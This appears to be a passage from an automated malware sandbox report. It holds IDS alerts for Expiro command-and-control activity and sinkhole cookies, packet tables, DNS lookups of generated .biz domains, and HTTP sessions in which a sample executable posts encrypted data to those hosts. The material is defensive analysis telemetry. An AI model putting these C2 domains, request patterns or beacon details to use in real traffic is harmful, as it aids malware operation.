2025-01-10T21:24:27.040825+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.141.10.107	80	192.168.2.7	49795	TCP
2025-01-10T21:25:00.871608+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	47.129.31.212	80	192.168.2.7	49990	TCP
2025-01-10T21:25:00.871608+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	47.129.31.212	80	192.168.2.7	49990	TCP
2025-01-10T21:25:08.131113+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	34.246.200.160	80	192.168.2.7	49996	TCP
2025-01-10T21:25:08.131113+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	34.246.200.160	80	192.168.2.7	49996	TCP
2025-01-10T21:25:11.418124+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	13.251.16.150	80	192.168.2.7	49999	TCP
2025-01-10T21:25:11.418124+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	13.251.16.150	80	192.168.2.7	49999	TCP
2025-01-10T21:25:14.219487+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	35.164.78.200	80	192.168.2.7	50003	TCP
2025-01-10T21:25:14.219487+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	35.164.78.200	80	192.168.2.7	50003	TCP
2025-01-10T21:25:14.750567+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	3.94.10.34	80	192.168.2.7	50004	TCP
2025-01-10T21:25:14.750567+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	3.94.10.34	80	192.168.2.7	50004	TCP
2025-01-10T21:25:24.640330+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.7	50011	18.141.10.107	80	TCP
2025-01-10T21:25:29.432881+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.246.231.120	80	192.168.2.7	50016	TCP
2025-01-10T21:25:29.432881+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.246.231.120	80	192.168.2.7	50016	TCP
2025-01-10T21:25:30.041296+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	34.227.7.138	80	192.168.2.7	50017	TCP
2025-01-10T21:25:30.041296+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	34.227.7.138	80	192.168.2.7	50017	TCP
2025-01-10T21:26:03.847123+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	3.254.94.185	80	192.168.2.7	50029	TCP
2025-01-10T21:26:03.847123+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	3.254.94.185	80	192.168.2.7	50029	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 21:24:16.730281115 CET	49733	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:16.735145092 CET	80	49733	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:16.735215902 CET	49733	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:16.744771004 CET	49733	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:16.744801998 CET	49733	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:16.749592066 CET	80	49733	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:16.749608040 CET	80	49733	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:17.442502022 CET	80	49733	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:17.442630053 CET	80	49733	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:17.442668915 CET	49733	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:17.443142891 CET	49733	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:17.447860956 CET	80	49733	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:17.467345953 CET	49739	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:17.472115040 CET	80	49739	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:17.472315073 CET	49739	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:17.472368002 CET	49739	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:17.472457886 CET	49739	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:17.477071047 CET	80	49739	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:17.477212906 CET	80	49739	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:18.856451035 CET	80	49739	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:18.856642962 CET	80	49739	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:18.857458115 CET	49739	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:18.891143084 CET	49739	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:18.895903111 CET	80	49739	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:19.062829971 CET	49750	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.067625999 CET	80	49750	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:19.067940950 CET	49750	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.067940950 CET	49750	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.067941904 CET	49750	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.072779894 CET	80	49750	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:19.072793961 CET	80	49750	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:19.097688913 CET	49751	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.102515936 CET	80	49751	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:19.102626085 CET	49751	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.103081942 CET	49751	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.103081942 CET	49751	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.107842922 CET	80	49751	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:19.107860088 CET	80	49751	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:19.651050091 CET	49750	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.805375099 CET	80	49751	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:19.805444002 CET	80	49751	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:19.805491924 CET	49751	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.806603909 CET	49751	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:19.811403036 CET	80	49751	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:19.882067919 CET	49758	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:19.886868000 CET	80	49758	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:19.886934042 CET	49758	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:19.887893915 CET	49758	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:19.887907028 CET	49758	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:19.892685890 CET	80	49758	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:19.892698050 CET	80	49758	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:21.256805897 CET	80	49758	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:21.257131100 CET	80	49758	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:21.257226944 CET	49758	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:21.279119968 CET	49758	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:21.283968925 CET	80	49758	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:21.987792015 CET	49770	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:21.992571115 CET	80	49770	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:21.992641926 CET	49770	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:21.993343115 CET	49770	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:21.993369102 CET	49770	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:21.998155117 CET	80	49770	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:21.998164892 CET	80	49770	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:22.704122066 CET	80	49770	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:22.704233885 CET	80	49770	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:22.704336882 CET	49770	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:22.704396009 CET	49770	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:24:22.709141016 CET	80	49770	54.244.188.177	192.168.2.7
Jan 10, 2025 21:24:25.637249947 CET	49795	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:25.642229080 CET	80	49795	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:25.642580986 CET	49795	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:25.655034065 CET	49795	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:25.655034065 CET	49795	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:25.660044909 CET	80	49795	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:25.660587072 CET	80	49795	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:27.035659075 CET	80	49795	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:27.035756111 CET	80	49795	18.141.10.107	192.168.2.7
Jan 10, 2025 21:24:27.035852909 CET	49795	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:27.036014080 CET	49795	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:24:27.040824890 CET	80	49795	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:03.560333967 CET	49993	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:03.565116882 CET	80	49993	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:03.565208912 CET	49993	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:03.565354109 CET	49993	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:03.565392971 CET	49993	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:03.571417093 CET	80	49993	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:03.571439028 CET	80	49993	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:04.930838108 CET	80	49993	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:04.930999041 CET	49993	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:04.931051970 CET	80	49993	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:04.931111097 CET	49993	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:04.937169075 CET	80	49993	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:12.390558958 CET	50002	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:12.395385981 CET	80	50002	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:12.396097898 CET	50002	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:12.396210909 CET	50002	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:12.396225929 CET	50002	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:12.401006937 CET	80	50002	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:12.401020050 CET	80	50002	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:13.288357019 CET	80	50002	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:13.288388014 CET	80	50002	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:13.288435936 CET	50002	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:13.288516998 CET	80	50002	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:13.288551092 CET	50002	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:13.288558960 CET	50002	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:13.294986963 CET	80	50002	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:15.936392069 CET	50006	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:15.941302061 CET	80	50006	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:15.941390038 CET	50006	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:15.941524982 CET	50006	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:15.941550970 CET	50006	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:15.946362019 CET	80	50006	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:15.946377039 CET	80	50006	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:16.925327063 CET	80	50006	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:16.925340891 CET	80	50006	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:16.925405979 CET	50006	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:16.925420046 CET	80	50006	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:16.925457001 CET	50006	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:16.925529003 CET	50006	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:16.925623894 CET	80	50006	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:16.925916910 CET	50006	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:16.930334091 CET	80	50006	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:18.737596035 CET	50009	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:18.742400885 CET	80	50009	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:18.742543936 CET	50009	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:18.742618084 CET	50009	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:18.742618084 CET	50009	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:18.747425079 CET	80	50009	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:18.747436047 CET	80	50009	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:19.101281881 CET	50009	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:19.129626989 CET	50010	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:19.134587049 CET	80	50010	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:19.134663105 CET	50010	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:19.134802103 CET	50010	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:19.134896040 CET	50010	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:19.139575958 CET	80	50010	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:19.139707088 CET	80	50010	54.244.188.177	192.168.2.7
Jan 10, 2025 21:25:23.080694914 CET	50010	80	192.168.2.7	54.244.188.177
Jan 10, 2025 21:25:23.269047022 CET	50011	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:23.273907900 CET	80	50011	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:23.273991108 CET	50011	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:23.274118900 CET	50011	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:23.274151087 CET	50011	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:23.278960943 CET	80	50011	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:23.278984070 CET	80	50011	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:24.640212059 CET	80	50011	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:24.640235901 CET	80	50011	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:24.640330076 CET	50011	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:24.640436888 CET	50011	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:24.645227909 CET	80	50011	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:26.008182049 CET	50014	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:26.014206886 CET	80	50014	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:26.014281034 CET	50014	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:26.014388084 CET	50014	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:26.014431000 CET	50014	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:26.019151926 CET	80	50014	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:26.019270897 CET	80	50014	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:27.080180883 CET	50014	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:27.104444027 CET	50015	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:27.109276056 CET	80	50015	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:27.109339952 CET	50015	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:27.109468937 CET	50015	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:27.109496117 CET	50015	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:27.114286900 CET	80	50015	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:27.114296913 CET	80	50015	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:28.474107981 CET	80	50015	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:28.474183083 CET	80	50015	18.141.10.107	192.168.2.7
Jan 10, 2025 21:25:28.474240065 CET	50015	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:28.474282026 CET	50015	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:25:28.479077101 CET	80	50015	18.141.10.107	192.168.2.7
Jan 10, 2025 21:26:15.847759008 CET	50038	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:26:15.852650881 CET	80	50038	18.141.10.107	192.168.2.7
Jan 10, 2025 21:26:15.852745056 CET	50038	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:26:15.852916002 CET	50038	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:26:15.852916002 CET	50038	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:26:15.857769966 CET	80	50038	18.141.10.107	192.168.2.7
Jan 10, 2025 21:26:15.857784033 CET	80	50038	18.141.10.107	192.168.2.7
Jan 10, 2025 21:26:17.311055899 CET	80	50038	18.141.10.107	192.168.2.7
Jan 10, 2025 21:26:17.311177015 CET	80	50038	18.141.10.107	192.168.2.7
Jan 10, 2025 21:26:17.311327934 CET	50038	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:26:17.311327934 CET	50038	80	192.168.2.7	18.141.10.107
Jan 10, 2025 21:26:17.316081047 CET	80	50038	18.141.10.107	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 21:24:09.637181997 CET	51533	53	192.168.2.7	1.1.1.1
Jan 10, 2025 21:24:15.366774082 CET	57664	53	192.168.2.7	1.1.1.1
Jan 10, 2025 21:24:15.374509096 CET	53	57664	1.1.1.1	192.168.2.7
Jan 10, 2025 21:24:17.452384949 CET	54645	53	192.168.2.7	1.1.1.1
Jan 10, 2025 21:24:17.459774971 CET	53	54645	1.1.1.1	192.168.2.7
Jan 10, 2025 21:24:18.903846979 CET	61643	53	192.168.2.7	1.1.1.1
Jan 10, 2025 21:24:18.911590099 CET	53	61643	1.1.1.1	192.168.2.7
Jan 10, 2025 21:24:19.011162043 CET	51529	53	192.168.2.7	1.1.1.1
Jan 10, 2025 21:24:19.018903017 CET	53	51529	1.1.1.1	192.168.2.7
Jan 10, 2025 21:24:19.841234922 CET	52268	53	192.168.2.7	1.1.1.1
Jan 10, 2025 21:24:19.848429918 CET	53	52268	1.1.1.1	192.168.2.7
Jan 10, 2025 21:24:21.770448923 CET	52399	53	192.168.2.7	1.1.1.1
Jan 10, 2025 21:24:21.960067034 CET	53	52399	1.1.1.1	192.168.2.7
Jan 10, 2025 21:24:25.593529940 CET	53	59691	1.1.1.1	192.168.2.7
Jan 10, 2025 21:24:27.089734077 CET	53	49501	1.1.1.1	192.168.2.7
Jan 10, 2025 21:24:27.099297047 CET	53	53327	1.1.1.1	192.168.2.7
Jan 10, 2025 21:25:28.504695892 CET	53	63276	1.1.1.1	192.168.2.7
Jan 10, 2025 21:26:09.067379951 CET	53	62633	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 21:24:09.637181997 CET	192.168.2.7	1.1.1.1	0xdd19	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:15.366774082 CET	192.168.2.7	1.1.1.1	0x8b43	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:17.452384949 CET	192.168.2.7	1.1.1.1	0x80a4	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:18.903846979 CET	192.168.2.7	1.1.1.1	0x294a	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:19.011162043 CET	192.168.2.7	1.1.1.1	0xc9ff	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:19.841234922 CET	192.168.2.7	1.1.1.1	0x3a48	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:21.770448923 CET	192.168.2.7	1.1.1.1	0xc507	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 21:24:09.643821001 CET	1.1.1.1	192.168.2.7	0xdd19	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 21:24:11.532665014 CET	1.1.1.1	192.168.2.7	0x2afa	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 21:24:11.532665014 CET	1.1.1.1	192.168.2.7	0x2afa	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:15.374509096 CET	1.1.1.1	192.168.2.7	0x8b43	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:17.459774971 CET	1.1.1.1	192.168.2.7	0x80a4	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:18.911590099 CET	1.1.1.1	192.168.2.7	0x294a	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:19.018903017 CET	1.1.1.1	192.168.2.7	0xc9ff	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:19.848429918 CET	1.1.1.1	192.168.2.7	0x3a48	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:21.960067034 CET	1.1.1.1	192.168.2.7	0xc507	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:25.593529940 CET	1.1.1.1	192.168.2.7	0x8	Name error (3)	zlenh.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:27.089734077 CET	1.1.1.1	192.168.2.7	0xda83	Name error (3)	uhxqin.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:24:27.099297047 CET	1.1.1.1	192.168.2.7	0xbf76	Name error (3)	anpmnmxo.biz	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pywolwnvd.biz

ssbzmoy.biz

cvgrf.biz

knjghuig.biz

vcddkls.biz

dwrqljrr.biz

oshhkdluh.biz

lrxdmhrr.biz

wllvnzb.biz

acwjcqqv.biz

warkcdu.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49733	54.244.188.177	80	7632	C:\Users\user\Desktop\I3LPkQh2an.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:24:16.744771004 CET	346	OUT	POST /w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 810
Jan 10, 2025 21:24:16.744801998 CET	810	OUT	Data Raw: 6b 0d 30 de 01 c3 f1 3a 1e 03 00 00 e4 f5 ae c7 73 11 10 6e 66 38 12 f1 c6 0b bc c4 e7 66 8f 48 1a 99 7b e5 1a b3 e7 ba ff 9b c3 3e 7b 36 d9 35 9d fa 65 c9 27 98 73 af 15 ef 7c fa 46 fc f4 fe 7b 6e ca c6 27 67 4e 71 fd 46 ca a6 fd b4 b6 98 dc 1e Data Ascii: k0:snf8fH{>{65e's\|F{n'gNqFz:KAzf*"9zo>w'V{Y6.m7~4?_G<jU[G1<Rma(SdvhsuFj<2_Ku!zQ_Q(1Bu
Jan 10, 2025 21:24:17.442502022 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:24:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=378a99d2b4d7ebefd54d02335b4c08ec\|8.46.123.189\|1736540657\|1736540657\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49739	18.141.10.107	80	7632	C:\Users\user\Desktop\I3LPkQh2an.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:24:17.472368002 CET	346	OUT	POST /cle HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 810
Jan 10, 2025 21:24:17.472457886 CET	810	OUT	Data Raw: 92 94 59 1b 57 0d da 15 1e 03 00 00 a6 43 5a 3d 31 20 c8 0c fc 6a 49 72 49 64 c9 84 00 d8 29 25 ef b8 4d f4 55 47 fb a2 20 91 7a ee b7 54 a8 7f c9 3d db e3 36 dc ab ae 25 ae 35 02 9b 7e 7f c1 c8 5e 80 9a 65 16 6d 6e a4 3c 98 8e 47 64 6a 4c 71 d1 Data Ascii: YWCZ=1 jIrId)%MUG zT=6%5~^emn<GdjLq^E)?ZeDS``+tKNy#I)^z_>32][@eS4%Rem,LRQ[Al,eq4z)_{%43.2v1\|lI9i8:0i\|q[!vb
Jan 10, 2025 21:24:18.856451035 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:24:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fd0b3beade1256b85d2e825fab331a7e\|8.46.123.189\|1736540658\|1736540658\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49750	54.244.188.177	80	7632	C:\Users\user\Desktop\I3LPkQh2an.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:24:19.067940950 CET	354	OUT	POST /wbjqiahuptwvb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 810
